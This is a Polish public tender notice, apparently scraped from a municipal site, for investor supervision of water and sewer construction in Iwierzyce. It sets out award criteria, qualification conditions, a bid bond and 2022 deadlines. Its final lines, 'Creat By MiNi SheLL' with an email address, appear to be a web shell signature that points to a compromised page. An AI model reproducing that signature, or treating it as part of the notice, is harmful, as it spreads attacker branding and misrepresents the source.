class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe inspektora nadzoru branży sanitarnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej:<br/>Warunek dotyczący zdolności technicznej lub zawodowej Wykonawcy, poprzez określenie minimalnych wymagań dotyczących:<br/> a) Doświadczenia wykonawcy,<br/> b) Osób skierowanych przez Wykonawcę do realizacji zamówienia, umożliwiających wykonanie zamówienia na odpowiednim poziomie jakości.<br/>ad. a) Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej jedną /1/ usługę pełnienia nadzoru inwestorskiego nad zadaniem inwestycyjnym o wartości zadania inwestycyjnego minimum 2 000 000,00 złotych brutto oraz co najmniej jedną /1/ usługę pełnienia nadzoru inwestorskiego nad zadaniem inwestycyjnym polegającym na budowie i/lub przebudowie sieci wodociągowej o wartości robót minimum 1 000 000,00 złotych brutto<br/><br/>UWAGA: Zamawiający nie dopuszcza sumowania wartości kilku realizacji o mniejszej wartości w celu wykazania spełnienia warunku udziału w postępowaniu.<br/><br/><br/>ad. b) Zamawiający żąda od Wykonawcy wskazania osób, które będą uczestniczyć <br/>w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi <br/>i doświadczeniem odpowiednim do funkcji, jakie zostaną im powierzone. Wykonawca na każdą funkcję wymienioną poniżej, wskaże osoby, które musi mieć dostępne na etapie realizacji zamówienia, tj.:<br/><br/>a) co najmniej jedną osobę, która będzie pełnić funkcję inspektora nadzoru robót branży sanitarnej, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. - Dz. U. z 2020 r. poz. 1333 ze zm.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831),<br/>	b) co najmniej jedną osobę, która pełnić będzie funkcję inspektora nadzoru robót branży instalacyjnej, posiadającą uprawnienia w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych, w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. - Dz. U. z 2020 r. poz. 1333 ze zm.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dn. 29.04.2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831)<br/><br/>Zamawiający dopuszcza wykazanie tej samej osoby posiadającej uprawnienia w więcej niż jednej ze wskazanych branż.<br/><br/>Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r., poz. 1333 z późn. zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">. Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/><br/>1) Wykaz usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy – (wzór wykazu zostanie przekazany wykonawcy, którego oferta została najwyżej oceniona)<br/><br/>2) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - (wzór wykazu zostanie przekazany wykonawcy, którego oferta została najwyżej oceniona)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	zobowiązanie podmiotu udostępniającego zasoby lub inny dokument wraz z oświadczeniami - jeżeli dotyczy,<br/>b)	pełnomocnictwo - jeżeli dotyczy,<br/>c)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które usługi wykonują poszczególni wykonawcy – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>d)	potwierdzenie wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w kwocie 2 000,00 zł (słownie: dwa tysiące i 00/100 złotych)<br/><br/>1. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/><br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r. poz. 299).<br/><br/>3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.<br/><br/>W przypadku wyboru pieniężnej formy, wadium należy wpłacić przelewem na rachunek bankowy: Bank Spółdzielczy w Sędziszowie Młp., Odział w Iwierzycach, na Nr 87 9172 1013 0260 0202 2000 0020, z dopiskiem; Wadium na zadanie: Pełnienie funkcji nadzoru inwestorskiego nad realizacją robót budowlanych w ramach zadania pn.: Budowa sieci wodociągowej i kanalizacyjnej w gminie Iwierzyce.<br/>4. Wadium wniesione w pieniądzu musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>6. Wadium musi obejmować okres związania ofertą, który wynosi 30 dni.<br/>7. W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8. Zamawiający dokona zwrotu wadium zgodnie z zapisami art. 98 ustawy Pzp.<br/>9. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie (konsorcjum, spółka cywilna) ubiegać się o udzielenie zamówienia. W takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/>Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>- postępowania o udzielenie zamówienia publicznego, którego dotyczy;<br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>2. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy.<br/>4. Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, mogą wykazać spełnienie warunków, o których mowa w pkt. III.3.4. łącznie, z zastrzeżeniem że oświadczenia, o którym mowa w art. 125 ust. 1 ustawy dotyczące wstępnego potwierdzenia, że wykonawcy spełniają warunki udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie, w którym wykazuje spełnianie warunków udziału w postępowaniu. W przypadku wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, brak istnienia podstaw wykluczenia musi wykazać każdy<br/>z wykonawców samodzielnie.<br/>5. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest obowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze umowy, stanowiącym Załącznik Nr 5 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniami zawartymi w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we Wzorze Umowy.<br/>4. Zmiana umowy wymaga dla swej ważności, zachowania formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://przetargi.iwierzyce.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-19 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-17</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający zaprosi do negocjacji, o ile będa prowadzone, trzech wykonawców, których oferty nie będą podlegać odrzuceniu i zostaną ocenione najwyżej na podstawie kryteriów oceny ofert, o których mowa w pkt IV 1.1) SWZ, tj. cena – waga 60%, - doświadczenie zawodowe inspektora nadzoru inwestorskiego branży sanitarnej – 40%

Creat By MiNi SheLL
Email: jattceo@gmail.com